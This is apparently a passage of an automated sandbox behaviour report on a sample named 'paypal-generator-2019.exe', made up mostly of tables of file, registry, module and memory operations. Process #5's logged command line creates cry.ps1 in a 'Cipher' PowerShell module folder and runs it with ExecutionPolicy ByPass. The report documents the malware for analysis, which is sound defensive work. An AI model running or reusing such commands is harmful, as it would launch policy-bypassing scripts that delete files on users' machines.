| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
652 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Read | STD_OUTPUT_HANDLE | size = 1, size_out = 1 |
|
91 | |
| Write | STD_OUTPUT_HANDLE | size = 36 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 33 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 95 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 62 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 45 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 139 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 66 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 28 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 40 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 115 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 50 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 89 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 90 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 133 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 57 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 46 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 119 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 175 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 104 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 99 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 87 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 102 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 106 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 170 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 160 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 167 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xa6c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x1030000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (23)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
8 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\CIiHmnxMn6Ps |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
|
1 |
Process #4: cmd.exe
52
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | cmd.exe /c mkdir C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:00:48, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa6c |
| Parent PID | 0x2f4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
55C
0x
4E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000b40000 | 0x00b40000 | 0x00b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b40000 | 0x00b40000 | 0x00b4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00b53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x00b83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ce0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cf1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00d7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d80000 | 0x00e3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x01030000 | 0x0107ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001080000 | 0x01080000 | 0x0507ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0517ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005340000 | 0x05340000 | 0x0534ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f5e0000 | 0x7f5e0000 | 0x7f6dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f6e0000 | 0x7f6e0000 | 0x7f702fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f708000 | 0x7f708000 | 0x7f70afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f70b000 | 0x7f70b000 | 0x7f70dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f70e000 | 0x7f70e000 | 0x7f70efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f70f000 | 0x7f70f000 | 0x7f70ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | - |
|
1 | |
| Create Directory | C:\Users | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | - |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x1030000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #5: cmd.exe
80
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:49, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Self Terminated |
| Monitor Duration | 00:01:37 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf4 |
| Parent PID | 0xc48 (c:\users\ciihmnxmn6ps\desktop\paypal-generator-2019.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CF8
0x
CFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000b50000 | 0x00b50000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00b5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00cdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ce3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x00cf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000da0000 | 0x00da0000 | 0x00e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ee0000 | 0x00f9dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x01030000 | 0x0107ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001080000 | 0x01080000 | 0x0507ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0517ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05180000 | 0x054b6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f420000 | 0x7f420000 | 0x7f51ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f520000 | 0x7f520000 | 0x7f542fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f548000 | 0x7f548000 | 0x7f548fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f549000 | 0x7f549000 | 0x7f54bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f54c000 | 0x7f54c000 | 0x7f54efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f54f000 | 0x7f54f000 | 0x7f54ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (21)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
